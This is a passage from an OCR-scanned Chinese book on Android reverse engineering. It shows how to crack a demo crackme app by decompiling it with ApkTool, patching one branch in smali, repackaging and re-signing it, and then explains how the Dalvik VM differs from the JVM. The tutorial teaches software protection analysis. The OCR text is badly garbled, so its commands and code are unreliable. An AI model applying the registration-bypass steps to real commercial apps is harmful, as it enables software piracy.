2.1.2 ”编译 生成 APK 文 件 


首先 启动 Android 程 序 运 行 环 境 ， 然 后 在 crackme02 工 程 上 点 击 右 
键 ， 在 弹出 的 菜单 中 选择 “Run As~Android Application”， 如 果 工 程 没 
有 任何 错误 ，Eclipse 会 根据 默认 配置 编译 并 启动 crackme02 程 序 。 可 以 
通过 菜单 项 “Run As~Run Configuration” 更 改 默认 的 启动 配置 选项 ， 如 
程序 启动 的 第 一 个 Activity、Android 平 台 的 版 本 等 。 





注音 
六 各 





Android 程 序 运 行 环境 可 以 使 用 真实 Android 设 备 或 Android 模 拟 器 ， 如 果 读 者 手 上 没有 
Android 设 备 。 可 以 按照 本 书 1.2.7 节 讲解 步 又 创建 模拟 器 ， 然 后 在 命令 行 下 输入 以 下 命令 启动 











多 


emulator-avd < 模拟 器 名 称 > 
以 后 在 讲解 过 程 中 启动 Android 程 序 运行 环境 的 步 又 不 再 歼 述 。 








程序 局 动 后 ， 输 入 任意 长 度 的 用 户 名 与 16 位 长 度 的 注册 码 ， 扣 击 注 
册 按 钮 程序 会 模拟 注册 软件 的 执行 效果 ， 如 图 2-3 所 示 。 





Android 程 序 破解 演示 实例 
用 户 名 : droider 


注册 码 : | asdf133asdfghkjl 


注册 





图 2-3 ”crackme02 程 序 的 运行 效果 


2.2 ”破解 第 一 个 程序 


本 节 将 以 上 一 节 编写 的 crackme02 程 序 为 例 ， 讲 解 破解 它 的 完整 流 


程 。 
2.2.1 如何 动手 ? 


破解 Android 程 序 通常 的 方法 是 将 apk 文 件 利 用 ApkTool 反 编译 ， 生 
成 Smali 格 式 的 反 汇编 代码 ， 然 后 阅读 Smali 文 件 的 代码 来 理解 程序 的 运 
行 机 制 ， 找 到 程序 的 突破 口 进行 修改 ， 最 后 使 用 ApkTool 重 新 编译 生成 
apk 文 件 并 签名 ， 最 后 运行 测试 ， 如 此 循环 ， 直 人 至 程序 被 成 功 破 解 。 

在 实际 的 分 析 过 程 中 ， 还 可 以 使 用 IDA Do OD 或 者 
dex2jar 与 jd-gui 配 合 来 进行 Java 源 人 码 级 的 分 析 等 ， 这 些 分 析 方 法 会 在 本 书 
的 第 5 章 进 行 详细 的 介绍 。 











2.2.2” 反 编译 APK 文 件 


ApkTool 是 跨 平 台 的 工具 ， 可 以 在 Windows 平 台 与 Ubuntu 平台 下 直 
接 使 用 。 使 用 前 到 http://code.google.com/p/android-apktool/ 下 载 
ApkTool， 目 前 最 新 版 本 为 1.4.3，Windows 平 台 需 要 下 载 
apktool1.4.3.tar.bz2 与 apktool-install-windows-r04-brut1.tar.bz2 两 个 压缩 
包 ， 将 下 载 后 的 文件 解压 到 同一 目录 下 ， 本 书 的 Windows 平 台 将 其 解压 
到 “D:\tools\Android\apktool* 目 录 ， 解 压 完成 后 将 该 目录 添加 到 系统 的 
PATH 环境 变量 中 ， 以 便 在 命令 行 下 直接 使 用 ， 如 果 是 Ubuntu 系统 则 需 
要 下 载 apktool1.4.3.tar.bz2 与 apktool-install-linux-r04-brut1l.tar.bz2， 本 书 
的 Ubuntu 平台 将 其 解压 到 “home/feicong/toolsapktool” 目 录 下 。 











在 Windows 平 台 下 ， 打 开 一 个 CMD 窗 口 ， 在 命令 行 下 直接 输入 
apktool 会 列 出 程序 的 用 法 。 

反 编 译 apk 文 件 的 命令 为 : apktool dlecode] [OPTS] <file.apk> 
[<dir>] 

编译 apk 文 件 的 命令 为 : apktool bluild] [OPTS] [<app_path>] 
[<out file>] 

在 命令 行 下 进入 要 反 编 译 的 apk 文 件 目 录 ， 输 入 命令 : “apktool dd 
crackme02.apk ”outdir*"， 稍 等 片刻 ， 程 序 束 会 扩编 译 完成 ， 如 图 2-4 所 
示 。 


oc C:\FINDOYS\systen32\cnd. exe 


:workspace\chapter2 2.2>»apktool d crackme@2.apk outdir 
: Baksmaling... 
: Loading resource table... 


D 

I 

I 

I: Loaded. 

I: Loading resource table from file: C:\Documents and Settings Mdministrator\apk 
LD 
I 
I 
I 
I 
I 


: Loaded. 

: Decoding file—resources... 
PT | --- 
: Done. 

: Copying assets and libs... 


D :woFkspaceNchapteFh2'\2 .27> 

















图 2-4 ”使 用 Apktool 反 编译 apk 文 件 


在 Ubuntu 平台 下 ， 使 用 Apktool 与 在 Windows 平 台 下 基本 相同 ， 有 具体 
步骤 读者 可 自行 实践 。 























2.2.3 ”分 析 APK 文 件 


反 编 译 apk 文 件 成 功 后 ， 会 在 当前 的 outdir 目 录 下 生成 一 系列 目录 与 
文件 。 其 中 smali 目 人 res 目 录 则 是 程 
序 中 所 有 的 资源 文件 ， 这 些 目录 的 子 目 录 和 文件 与 开发 时 的 源码 目录 组 











织 结构 是 一 致 的 。 

如 何 寻找 突破 口 是 分 析 一 个 程序 的 关键 。 对 于 一 般 的 Android 来 
说 ， 错 误 提 示 信 息 通常 是 指引 关键 代码 的 风 疝 标 ， 在 错误 提示 附近 一 般 
是 程序 的 核心 验证 代码 ， 分 析 人 员 需 要 阅读 这 些 代 码 来 理解 软件 的 注册 

错误 提示 是 Android 程 序 中 的 字符 串 资 源 ， 开 发 Android 程 序 时 ， 这 
些 字 符 串 可 能 硬 编码 到 源码 中 ， 也 可 能 引用 自 “resvvalues” 目 录 下 的 
strings.xml 文 件 ，apk 文 件 在 打包 时 ，strings.xzml 中 的 字符 串 被 加 密 存 储 
为 resources.arsc 文 件 保存 到 apk 程 序 包 中 ，apk 被 成 功 反 编译 后 这 个 文件 
也 被 解密 出 来 了 。 

还 记得 2.1.2 节 运行 程序 时 的 错误 提示 吗 ? 在 软件 注册 失败 时 会 
Toast 弹 出 “无 效用 户 名 或 注册 码 ”， 我 们 以 此 为 线索 来 寻找 关键 代码 。 打 
开 *resvvalues\string.xzml” 文 件 ， 内 容 如 下 : 


< ?Xml version="1.0" encoding="utf-8"?> 











<string 
<string 
<string 
<string 


<string 


<resources> 
<string name="app_name">Crackme0201</string> 
<string name="hello world">Hello world!</string> 
<string name="menu settings">Settings</string> 
<string name="title activity main">crackme02</string> 
<string name="info">Android 程 序 破解 演示 实例 </string> 


name="username"> 用 户 名 : </string> 
name="sn"> 注 册 公 : </string> 
name="register"> 注 册 </string> 
name="hint_username"> 请 输入 用 户 名 </string> 


name="hint_sn"> 请 输入 16 位 的 注册 个 </ string> 


<string name="unregister"> 程 序 示 注册 </string> 
<string name="registered"> 程 序 已 注册 </string> 
<string name="unsuccessed"> 无 效用 户 名 或 注册 码 </string> 
<string name="successed"> 蕉 真 您 ! 注册 成 功 </string> 


</resources> 


开发 Android 程 序 时 ，String.xml 文 件 中 的 所 有 字符 串 资 源 都 
在 “gen/<packagename>/R.java” 文 件 的 String 类 中 被 标识 ， 每 个 字符 串 都 
有 唯一 的 int 类 型 索引 值 ， 使 用 Apktool 反 编译 apk 文 件 后 ， 所 有 的 索引 值 
保存 在 string.xml 文 件 同 目 录 下 的 public.xml 文 件 中 。 

从 上 面 列 表 中 找到 “无 效用 户 名 或 注册 码 ” 的 字符 串 名 称 为 
unsuccessed。 打 开 public.xml 文 件 ， 它 的 内 容 如 下 : 


<?xml] version="1.0" encoding="utf-8"?> 





<resources> 
<public type="drawable" name="ic launcher" id="0x7f020001" /> 
<public type="drawable" name="ic action search" id="0x7f020000" /> 
<public type="l]layout" name="activity main" id="0x7f030000" /> 
<public type="dimen" name="padding_ small" id="0x7f040000" /> 
<public type="dimen" name="padding medium" id="0x7f040001" /> 
<public type="dimen" name="padding_large" id="0x7f040002" /> 
<public type="string" name="app. name" id="0x7f050000" /> 
<public type="string" name="hello_world" id="0x7f050001" /> 
<public type="string" name="menu_settings" id="0x7f050002" /> 
<public type="string" name="title activity main" id="0x7f050003" /> 
<public type="string" name="info" id="0x7f050004" /> 
<public type="string" name="username" id="0x7f050005" /> 
<public type="string" name="sn" id="0x7f050006" /> 
<public type="string" name="register" id="0x7f050007" /> 
<public type="string" name="hint username" id="0x7f050008" /> 
<public type="string" name="hint sn" id="0x7f050009" /> 
<public type="string" name="unregister" id="0x7f05000a" /> 
<public type="string'" name="registered" id="0x7f05000b" /> 
<public type="string" name="unsuccessed" id="0x7f£f05000c" /> 
<public type="string" name="successed" id="0x7f05000d" /> 
<public type="style" name="AppTheme" id="0x7f060000" /> 
<public type="menu" name="activity _ main" id="0x7f070000" /> 
<public type="id" name="textViewl" id="0x7f080000" /> 
<public type="id" name="edit username" id="0x7f080001" /> 
<public type="id" name="edit_ sn" id="0x7f080002" /> 
<public type="id" name="button register" id="0x7f080003" /> 
<public type="id" name="menu settings" id="0x7f080004" /> 
</resources> 





unsuccessed 的 id 值 为 0x7f05000c， 在 smali 目 录 中 搜索 含有 内 容 为 
0x7f05000c 的 文件 ， 最 后 发 现 只 有 MainActivity$1.smali 文 件 一 处 调用 ， 





代码 如 下 : 

# virtual methods 

.method public onClick(Landroid/view/View;)V 
.locals 4 
.parameter "V" 
.prologue 

const/4 v3, 0x0 

.line 32 

#calls: 

Lcom/droider/crackme0201/MainActivity;->checkSN (Ljava/lang/SsString; 

Ljava/lang/String;)2Z 

invoke-static {v0O, vil, v2}, Lcom/droider/crackme0201/MainActivity;-> 
access$2 (Lcom/droider/crackme0201/MainActivity;Ljava/lang/String; 
Ljava/lang/String;)z # 检查 注册 人 码 是 否 合法 

move-result v0 

if-nez v0，:cond_0 # 如 果 结 果 不 为 0， 就 跳 转 到 condq_0 标 号 处 

.line 34 

iget-object v0, pO0, Lcom/droider/crackme0201/MainActivity$1;-> 
this$0:Lcom/droider/crackme0201/MainActivity; 

“17 3S 

const v1，0x7f05000c # unsuccessed 字 符 串 

.line 34 

invoke-static {v0O, vl1, v3}, Landroid/widget/Toast;-> 
makeText (Landroid/content/Context;II)Landroid/widget/Toast; 

move-result-object v0 

LHe B35 

invoke-virtual {v0}, Landroid/widget/Toast;->show()V 

.line 42 

:goto_0 

return-void 

.line 37 

"CONnG 0 


iget-object v0O, p0, Lcom/droider/crackme0201/MainActivity$1;-> 
this$0:Lcom/droider/crackme0201/MainActivity; 
.line 38 
const vi， 0x7f05000d # successed 字 符 串 
slimne SH 
invoke-static {v0O, v1, v3}, Landroid/widget/Toast;-> 
makeText (Landroid/content/Context;I1II)Landroid/widget/Toast; 
move-result-object v0 
.line 38 
invoke-virtual {v0}, Landroid/widget/Toast;->show()V 
.line 39 
iget-object vO, pO0, Lcom/droider/crackme0201/MainActivity$1;-> 
this$0:Lcom/droider/crackme0201/MainActivity; 
#getter for: Lcom/droider/crackme0201/MainActivity;->btn register:Landroid/ 
widget/Button; 
invoke-static {vO}, Lecom/droider/crackme0201/MainActivity;-> 
access$3 (Lcom/droider/crackme0201/MainActivity;)Landroid/widget 
/Button; 
move-result-object v0 
invoke-virtual {v0O, v3}, Landroid/widget/Button;->setEnabled(2Z)V 
# 设 置 注册 按钮 不 可 用 
.line 40 
iget-object vO, p0, Lcom/droider/crackme0201/MainActivity$1;-> 
this$0:Lcom/droider/crackme0201/MainActivity; 
const vi，0x7f05000b# registered 字 符 串 ， 模 拟 注 册 成 功 
invoke-virtual {v0O, vl}, Lcom/droider/crackme0201/MainActivity;-> 
setTitle(I)V 
goto :goto_0 
.end method 


Smali 代 码 中 添加 的 注释 使 用 井 号 “#” 开 头 ，“.line 32” 行 调用 了 
checkSNO 函 数 进行 注册 码 的 合法 检查 ， 接 着 下 面 有 如 下 两 行 代码 : 


move-result wO0 








if-nez vO, :cond_0 

checkSN() 函 数 返 回 Boolean 类 型 的 值 。 这 里 的 第 一 行 代码 将 返回 的 
结果 保存 到 v0 寄存 器 中 ， 第 二 行 代码 对 v0 进行 判断 ， 如 果 v0 的 值 不 为 
零 ， 即 条 件 为 真 的 情况 下 ， 跳 转 到 cond_0 标 号 处 ， 反 之 ， 程 序 顺利 向 下 














如 末代 码 不 跳 转 ， 会 执行 如 下 几 行 代码 : 


.line 34 

iget-object vO, p0, Lcom/droider/crackme0201/MainActivity$1;-> 
this$0:Lcom/droider/crackme0201/MainActivity; 

-11de :35 

const vl, Ox7f05000c # unsuccessed 字 符 串 

.line 34 

invoke-static {vO, vl, v3}, Landroid/widget/Toast;-> 
makeText (Landroid/content/Context;II)Landroid/widget/Toast; 

move-result-object v0 

.line 35 

invoke-virtual {v0}, Landroid/widget/Toast;->show()V 

.line 42 

sgoto_Q 

return-void 


“line 34” 行 使 用 iget-object 指 令 获 取 MainActivity 实 例 的 引用 。 代 码 


中 的 ->this$0 是 内 部 类 MainActivity$1 中 的 一 个 synthetic 字 段 ， 存 储 的 是 
父 类 MainActivity 的 引用 ， 这 是 Java 语 言 的 一 个 特性 ， 类 似 的 还 有 - 
>access$0， 这 一 类 代码 会 在 本 书 的 第 5 章 进 行 详 细 介 绍 。 


“line ”35” 行 将 v1 寄存 器 传 入 unsuccessed 字 符 串 的 id 值 ， 接 着 调用 


Toast;->makeText() 创 建 字 符 串 ， 然 后 调用 Toast;->show()V 方 法 弹出 提 
示 ， 最 后 .line 40 行 调用 retum-void 函 数 返 回 。 


如 果 代 码 跳 转 ， 会 执行 如 下 代码 : 


:cond_0 

iget-object vO, p0, Lcom/droider/crackme0201/MainaActivity$1;-> 
this$s0:Lcom/droider/crackme0201/MainActivity; 

.line 38 

const vi, 0x7f05000d # _ successed 字 符 串 

.line 37 

invoke-static {v0，vL，v3}，LanadqroiaQ/wiadgety/yToast; -> 
makeText (Landroid/content/Context;II)Landroid/widget/Toast; 

move-result-object vO 

.line 38 

invoke-virtual {v0}, Landroid/widget/Toast;->show()y 

.line 39 

iget-object vO, p0, Lcom/droider/crackme0201/MainActivity$1;-> 
this$0:Lcom/droider/crackme0201/MainActivity; 

#getter for: Leom/droider/crackme0201/MainActivity;->btn _ register:Landroid/ 
widget/Button; 

invoke-static {vO}, Lcom/droider/crackme0201/MainActivity;-> 
access$3 (Lcom/droider/crackme0201/MainActivity;)Landroid/widget/Button; 

move-result-object v0 

invoke-virtual {v0, v3}, Landroid/widget/Button;->setEnabled(Z)V # 设 置 注 

册 按 钮 不 可 用 

.line 40 

iget-object vO, p0, Lcom/droider/crackme0201/MainActivity$1;-> 
this$0:Lcom/droider/crackme0201/MainActivity; 

const vl, 0x7f05000b # registered 字 符 串 ， 模 拟 注册 成 功 

invoke-virtual {v0O, vl}, Leom/droider/crackme0201/MainaActivity;->setTitle(I)V 

5 :goto_0 


这 段 代 码 的 功能 是 弹出 注册 成 功 提 示 ， 也 残 是 说 ， 上 面 的 跳 转 如 果 





注意 
Smali 代 码 的 语法 与 格式 会 在 本 书 第 3 章 进行 详细 介绍 。 





2.2.4 修改 $mali 文 件 代 码 


上 一 小 节 的 分 析 可 以 发 现 ,“.line ”32” 行 的 代码 “if-nez v0， 


:cond_0? 是 程序 的 破解 点 。 让 nez 是 Dalvik 指 令 集中 的 一 个 条 件 跳 转 指 


， 类似 的 还 有 if-eqz、if-gez、if-lez 等 。 这 些 指令 会 在 本 书 第 3 章 进 行 
介绍 ， 读 者 在 这 里 只 需要 知道 ， 与 if-nez 指 令 功 能 相反 的 指令 为 if-eqz， 
表示 比较 结果 为 0 或 相等 时 进行 跳 转 。 

用 任意 一 款 文本 编辑 器 打开 MainActivity$1.smali 文 件 ， 将 “.line 
32” 行 的 代码 “if-nez v0，:cond_0” 修 改 为 “if-eqz v0，:cond_0”， 保 存 后 退 
出 ， 代 码 就 算 修 改 完成 了 。 


2.2.5 重新 编译 APK 文 件 并 签名 


修改 完 Smali 文 件 代 码 后 ， 需 要 将 修改 后 的 文件 重新 进行 编译 打包 
成 apk 文 件 。2.2.2 小 节 中 我 们 已 经 知道 编译 apk 文 件 的 命令 格式 
为 “apktool b[uild] [OPTS] [<app_path>][<out file>] ”， 打 开 CMD 命 令 
提示 符 窗 口 ， 进 入 到 outdir 同 目录 ， 执 行 以 下 命令 。 

apktool b outdir 

不 出 意外 的 话 ， 程 序 就 会 编译 成 功 。 命 令 输 出 结果 如 图 2-5 所 示 ， 
编译 成 功 后 会 在 outdir 目 录 下 生成 dist 目 录 ， 里 面 存 放 着 编译 成 功 的 apk 
人 


c C:\VFINDOVS\systenm32\cnd. exe 


今 
J 








D :wokkspbaceNchaptek2\2 .2>apktool b outdir 
TI: Checking whether sources has changed... 
人 
1 
2 


Smaling... 
Checking whether resources has changed... 
Building apk file... 


D:\workspace chapter2\2.2> 








图 2-5 ”使 用 ApkTool 重 新 打包 Android 程 序 
编译 后 成 的 crackme02.apk 没 有 签名 ， 还 不 能 安装 测试 ， 接 下 来 需要 
使 用 signapk.jar 工 具 对 apk 文 件 进行 签名 。signapk.jar 是 Android 源 码 包 中 
的 一 个 签名 工具 。 代 码 位 于 Android 源 码 目 录 下 

















的 /build/tools/signapk/SignApk.java 文 件 中 ， 源 码 编译 后 可 以 

在 /out/host/linuxx86/framework 目 录 中 找到 它 。 使 用 signapk.jar 签 名 时 需 
要 提供 签名 文件 ， 我 们 在 此 可 以 使 用 Android 源 码 中 提供 的 签名 文件 
testkey.pk8 与 testkey.x509.pem， 它 们 位 于 Android 源 码 的 
build/target/product/security 目 录 。 新 建 signapk.bat 文 件 ， 内 容 为 : 


java -Jar "%~dp0signapk.jar" "$%~dp0testkey.x509.pem" "%®%~dp0Otestkey.pk8" %1 
signed.apk 


将 signapk.jar、signapk.bat、testkey.x509.pem、testkey.pk8 等 4 个 文件 
放 到 同一 目录 并 添加 到 系统 PATH 环境 变量 中 ， 然 后 在 命令 提示 符 下 输 
入 如 下 命令 对 APK 文 件 进行 签名 。 

signapk crackme02 .apk 

签名 成 功 后 会 在 同 目录 下 生成 signed.apk 文 件 。 


2.2.6 ”安装 测试 


现在 是 时 候 测试 修改 后 的 成 果 了 。 

启动 一 个 Android AVD， 或 者 使 用 数据 线 连接 手机 与 电脑 ， 然 后 在 
命令 提示 符 下 执行 以 下 命令 安装 破解 后 的 程序 。 

adb install signed.apk 

不 出 意外 会 得 到 以 下 输出 提示 : 

adb install signed.apk 

822 KB/s (39472 bytes in 0.046s) 

pkg: /data/local/tmp/signed.apk 





Success 

安装 完成 后 启动 crackme02， 在 用 户 名 与 注册 码 输 入 框 中 输入 任 剖 
字符 ， 点 击 注册 按钮 ， 程 序 会 弹出 注册 成 功 提示 ， 并 且 标 题 栏 字符 会 变 
成 已 注册 字样 。 如 图 2-6 所 示 。 





Android 程 序 破解 演示 实例 





用 户 和 名: droider 
| 
注册 码 : | cracked 


注册 

















i 











图 2-6 ”测试 破解 后 的 程序 


2.3 本章 小 结 


本 章 通 过 一 个 实例 介绍 了 Android 程 序 的 一 般 分 析 与 破解 流程 。 在 
实际 的 分 析 过 程 中 ， 接 触 到 的 代码 远 比 这 些 要 复杂 得 多 ， 有 些 代 码 甚至 
经 过 混 消 处 理 过 ， 很 难 阅 读 ， 这 样 吏 需要 使 用 其 它 手 段 如 动态 调试 结合 
一 些 其 它 的 技巧 来 辅助 分 析 ， 这 些 更 深入 的 内 容 会 在 本 书 的 后 续 章节 中 
进行 介绍 。 











第 3 草 ”进入 Android Dalvik 虚 拟 机 


虽然 Android 平 合 使 用 Java 语 言 来 开发 应 用 程序 ， 但 Android 程 序 却 
不 是 运行 在 标准 Java 虚 拟 机 上 的 。 可 能 是 为 了 解决 移动 设备 上 软件 运行 
效率 的 问题 ， 也 可 能 是 为 了 规避 与 Oracle 公 司 的 版 权 纠纷 。Google 为 
Android 平 台 专 门 设计 了 一 套 虚拟 机 来 运行 Android 程 序 ， 它 束 是 Dalvik 
Virtual Machine (Dalvik 虚 拟 机 ) 。 本 章 将 讨论 Dalvik 虚 拟 机 的 特性 及 基 
于 Dalvik 字 节 码 的 汇编 语言 知识 。 














3.1 Dalvik 虚 拟 机 的 特点 一 一 掌握 Android 程 序 的 
运行 原理 


本 节 主 要 介绍 Dalvik 的 基本 特性 以 及 工作 原理 ， 这 对 掌握 Android 程 
序 运 行 原 理 尤 为 重要 。 


3.1.1 Dalvik 虚 拟 机 概述 


Google 于 2007 年 底 正 式 发 布 了 Android  SDK，Dalvik 虚 拟 机 也 第 一 
次 进入 了 人 们 的 视野 。 它 的 作者 是 丹 伯 恩 斯 坦 (Dan Bornstein ) ， 名 字 
来 源 于 他 的 祖先 曾经 居住 过 的 名 叫 Dalvik 的 小 渔村 。Dalvik 虚 拟 机 作为 
Android 平 台 的 核心 组 件 ， 拥 有 如 下 几 个 特点 : 

e 体积 小 ， 占 用 内 存 空间 小 ; 

e 专 有 的 DEX 可 执行 文件 格式 ， 体 积 更 小 ， 执 行 速度 更 快 ; 

e 销量 池 采 用 32 位 索引 值 ， 寻 址 类 方法 名 、 字 段 名 、 和 常量 更 快 ; 

e 基于 寄存 器 架构 ， 并 拥有 一 套 完 整 的 指令 系统 ; 

e 提供 了 对 象 生 命 周期 管理 、 堆 栈 管 理 、 线 程 管 理 、 安 全 和 有 异 香 
管理 以 及 垃圾 回收 等 重要 功能 ; 

e 所 有 的 Android 程 序 都 运行 在 Android 系 统 进程 里 ， 每 个 进程 对 
应 着 一 个 Dalvik 虚 拟 机 实例 。 








3.1.2 Dalv 录 虚拟 机 与 Java 虚 拟 机 的 区 别 


Dalvik 虚 拟 机 与 传统 的 Java 虚 拟 机 有 着 许多 不 同 点 ， 两 者 并 不 兼 
容 ， 它 们 显著 的 不 同 点 主要 表现 在 以 下 几 个 方面 : 
1. Java 虚 拟 机 运行 的 是 Java 字 节 人 码 ，Dalvik 虚 拟 机 运行 的 是 





Dalvik 字 节 码 。 

传统 的 Java 程 序 经 过 编译 ， 生 成 Java 字 节 码 保存 在 class 文 件 中 ， 
Java 虚 拟 机 通过 解码 class 文 件 中 的 内 容 来 运行 程序 。 而 Dalvik 虚 拟 机 运 
行 的 是 Dalvik 字 节 码 ， 所 有 的 Dalvik 字 节 码 由 Java 字 节 码 转换 而 来 ， 并 
被 打包 到 一 个 DEX (Dalvik Executable) 可 执行 文件 中 。Dalvik 虚 拟 机 通 
过 解释 DEX 文 件 来 执行 这 些 字 节 码 。 

2. Dalvik 可 执行 文件 体积 更 小 。 

Android SDK 中 有 一 个 叫 dx 的 工具 负责 将 Java 字 节 人 码 转换 为 Dalvik 字 
节 人 码 。dx 工 具 对 Java 类 文件 重新 排列 ， 消 除 在 类 文件 中 出 现 的 所 有 见 余 
言 轧 ， 避 免 虚 拟 机 在 初始 化 时 出 现 反复 的 文件 加 载 与 解析 过 程 。 一 般 情 
况 下 ，Java 类 文件 中 包含 多 个 不 同 的 方法 签名 ， 如 果 其 他 的 类 文件 引用 
该 类 文件 中 的 方法 ， 方 法 签名 也 会 被 复制 到 其 类 文件 中 ， 也 就 是 说 ， 多 
个 不 同 的 类 会 同时 包含 相同 的 方法 签名 ， 同 样 地 ， 大 量 的 字符 串 常量 在 
多 个 类 文件 中 也 被 重复 使 用 。 这 些 见 余 信息 会 直接 增加 文件 的 体积 ， 同 
时 也 会 严重 影响 虚拟 机 解析 文件 的 效 紊 。dx 工 具 针 对 这 个 问题 专门 做 了 
处 理 ， 它 将 所 有 的 Java 类 文件 中 的 第 量 池 进行 分 解 ， 消 除 其 中 的 元 余 信 
息 ， 重 新 组 合 形成 一 个 常量 池 ， 所 有 的 类 文件 共享 同一 个 常量 池 。dx 工 
具 的 转换 过 程 如 图 3-1 所 示 。 由 于 dx 工具 对 常量 池 的 压缩 ， 使 得 相同 的 
字符 串 、 常 量 在 DEX 文 件 中 只 出 现 一 次 ， 从 而 减 小 了 文件 的 体积 。 
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class 文 件 
constance pools | > dex header 
Other data 一 
i Pp string_ids 
Sa | > type_ids 
constance pools | | i pp Proto_ids 
3 
Other data = p> field_ids 
class 文 件 | 1 rr-----+--- method ids 
constance pools | 7 71 7 > 
B class_def 
Other data | > 
4 other data 

















图 3-1 ” Java 文件 转换 为 DEX 文 件 


3. Java 虚 拟 机 与 Dalvik 虚 拟 机 架构 不 同 。 

Java 虚 拟 机 基于 栈 染 构 。 程 序 在 运行 时 虚拟 机 需要 频繁 的 从 栈 上 读 
取 或 写 入 数据 ， 这 个 过 程 需要 更 多 的 指令 分 派 与 内 存 访问 次 数 ， 会 耗 比 
不 少 CPU 时 间 ， 对 于 像 手机 设备 资源 有 限 的 设备 来 说 ， 这 是 相当 大 的 一 
笔 开 销 。 

Dalvik 虚 拟 机 基于 寄存 器 架构 。 数 据 的 访问 通过 寄存 占 间 直接 传 
递 ， 这 样 的 访问 方式 比 基 于 栈 方 式 要 快 很 多 。 下 面 通过 一 个 实例 来 对 比 
一 下 Java 字 市 码 与 Dalv 闵 字 市 码 的 区 别 。 测 试 代码 如 下 。 











public class Hello { 
Bublie :int Eoo(int a; 1nt BB) 1 


return (a + b) * (a - b); 


public static void main(Sstring[] argc) ({ 
Hello hello = new Hello!(); 
System.out .println(hello.foo(S5, 3)); 


} 

将 以 上 内 容 保 存 为 Hello.java。 打 开 命 令 提 > .0 ee 行 命令 “javac 
Hello.java” 编 译 生成 Hello.class 文 件 。 然 后 执行 命 --dex 
output=Hello.dex Hello.class” 生 成 dex 文 件 。 

接 下 来 使 用 javap 反 编译 Hello.class 查 看 foo0 函 数 的 Java 字 节 码 ， 执 


行 以 下 命令 。 
J -C -classpath . Hello 
命令 执行 后 得 到 如 下 代码 : 
DUBLLTe InNt Fo0(Lnts Latys 
Code: 
0; ,Tic 卫 
1 liload_2 
2 iadd 
iload_1 
4: iload 2 
和 isub 
6: imul 
人 ijreturn 


使 用 dexdump.exe (位 于 Android SDK 的 platform-tools 目 录 中 ) 查看 
foo0 函 数 的 Dalvik 字 节 码 ， 执 行 以 下 命令 。 


Qexqurmp .exXxe -Q Hello.dex 


命令 执行 后 整理 输出 结果 ， 可 以 得 到 如 下 代码 。 
Hello.foo: (II}I 

0000: add-int vO, v3, v4 

0002: sub-int vl, v3, v4 

0004: mul-int/2addr vO, vil 

0005: return v0 





VN 
注 轧 























如 果 使 用 JDK1.7 编 译 Hello.java， 生 成 的 Hello.class 默 认 的 版 本 会 比较 低 ， 使 用 dx 生成 dex 文 
件 会 提示 class 文 件 无 效 。 解 决 方法 是 强制 指定 class 文 件 的 版 本 ， 执 行 如 下 命令 重新 编译 。 
Javac -source 1.6 -target 1.6 Hello.java 
使 用 dx 工具 编译 Hello.class 时 ， 如 果 提 示 无 法 找到 Hello.class 文 件 ， 可 以 将 Hello.class 文 件 与 


dx 放 同 一 目录 后 重新 编译 。 



































查看 上 面 的 Java 字 节 码 ， 发 现 foo(0) 函 数 一 共 占用 了 8 个 字 节 ， 代 码 
中 每 条 指令 占用 1 个 字 节 ， 并 且 这 些 指令 都 没有 参数 。 那 么 这 些 指 令 是 
如 何 存 取 数据 的 呢 ? Java 虚 拟 机 的 指令 集 被 称 为 堆 地 址 形式 的 指令 集 ， 
所 谓 零 地 址 形式 ， 是 指 指令 的 源 参数 与 目标 参数 都 是 隐 含 的 ， 它 通过 
Java 虚 拟 机 中 提供 的 一 种 数据 结构 “ 求 值 栈 ” 来 传递 的 。 

对 于 Java 程 序 来 说， 每 个 线程 在 执行 时 都 有 一 个 PC 计数 器 与 一 个 
Java 栈 。PC 计 数 器 以 字 节 为 单位 记录 当前 运行 位 置 距离 方法 开头 的 偏 移 
量 ， 它 的 作用 类 似 于 ARM 架 构 CPU 的 PC 寄存 器 与 X86 染 构 CPU 的 也 寄存 
器 ， 不 同 的 是 PC 计数 器 只 对 当前 方法 有 效 ，Java 虚 拟 机 通过 它 的 值 来 取 
站 令 执 行 。Java 栈 用 于 记录 Java 方 法 调用 的 “活动 记录 ” (activation 
record) ，Java 栈 以 帧 〈frame) 为 单位 保存 线程 的 运行 状态 ， 每 调用 一 
个 方法 就 会 分 配 一 个 新 的 栈 帧 压 入 Java 栈 上 ， 每 从 一 个 方法 返回 则 弹出 
并 撤销 相应 的 栈 帧 。 每 个 栈 帧 包括 局 部 变量 区 、 求 值 栈 〈JVM 规 范 中 将 
其 称 为 “操作 数 栈 ”) 和 其 他 一 些 信息 。 局 部 变量 区 用 于 存储 方法 的 参数 























与 局 部 变量 ， 其 中 参数 按 源码 中 从 左 到 右 顺 序 保 存在 局 部 变量 区 开头 的 
几 个 slot 中 。 求 值 栈 用 于 保存 求 值 的 中 间 结 果 和 调用 别 的 方法 的 参数 
等 ，JVM 运 行 时 它 的 状态 结构 如 图 3-2 所 示 。 


PC 计数 器 
foo() 录 数 “ 
偏 移 量 助词 符 
0: iload 1 局 部 变量 区 
iload 2 0 
PC 一 2: iadd 1 
iload 1 2 3 
4: iload 2 
isub 求 值 栈 
6: imul 
7: ireturn 栈 项 一 > 3 
5 


图 3-2 JVM 运 行 状 态 


结合 代码 来 理解 上 面 的 理论 知识 。 由 于 每 条 指令 占用 一 个 字 节 空 
| 间 ，foo() 函 数 Java 字 厄 人 码 左边 的 偏 移 量 就 是 程序 执行 到 每 一 行 代码 时 PC 
的 值 ， 并 且 Java 虚 拟 机 最 多 只 支持 0xff 条 指令 。 第 1 条 指令 iload_1 可 分 成 
两 部 分 : 第 一 部 分 为 下 划 线 左边 的 iload， 它 属于 JVM (Java 虚 拟 机 ) 指 
令 集中 load 系 列 中 的 一 条 ，i 是 指令 前 级 ， 表 示 操 作 类 型 为 int 类 型 ，load 
表示 将 局 部 变量 存 入 Java 栈 ， 与 之 类 似 的 有 lload、fload、dload 分 别 表示 
将 long、float、dload 类 型 的 数据 进 栈 ， 第 二 部 分 为 下 划 线 右边 的 数字 ， 
表示 要 操作 具体 哪个 局 部 变量 ， 索 引 值 从 0 开始 计数 ，iload_1 表 未 将 第 
二 个 int 类 型 的 局 部 变量 进 栈 ， 这 里 第 二 个 局 部 变量 是 存放 在 局 部 变量 区 
































foo0 函 数 的 第 二 参数 。 同 理 ， 第 2 条 指令 iload_2 取 第 二 个 参数 。 第 3 条 指 
令 iadd 从 栈 顶 弹出 两 个 int 类 型 值 ， 将 值 相 加 ， 然 后 把 结果 压 回 栈 顶 。 第 
